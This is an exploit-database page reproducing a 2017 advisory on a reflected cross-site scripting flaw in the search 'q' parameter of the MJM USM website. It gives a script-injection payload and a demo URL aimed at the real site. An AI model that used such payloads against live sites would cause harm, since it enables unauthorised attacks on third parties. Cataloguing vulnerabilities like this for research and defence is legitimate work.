Advertisement






MJM Usm Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2017-10-18
CPE
cpe:cpe:/a:mjm:usm:cross-site-scripting
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.048343 0.77123

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017100128

Below is a copy:

MJM Usm Cross Site Scripting
##########################
# Exploit Title: MJM Usm Cross Site Scripting
# Date: 2017-10-17
# Discovered By: ArashHC
# Tested on : Win10, Win8, Kali Linux
##########################

#Vulnerability is the site search field

q parameter have bug!

Inject this code after q=
"><script>alert('ArashHC')</script>

##########################
# Demo : http://mjm.usm.my/index.php?r=/cms/entry/search&q="><script>alert('CyberSoldiersST')</script>
# Only on firefox webbrowser!!
##########################
# Thanks to : EreBus, RexProg, Crazy_Boy, AVENGER, ViRuS007, BlackWolfIran, LM7RIX, AliCyber, </ZED>, Agent W, AnonyCoder, Sarbaz Vatan, unknown0707, FarsProg
# https://t.me/CyberSoldiersST
# Discovered By: ArashHC

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum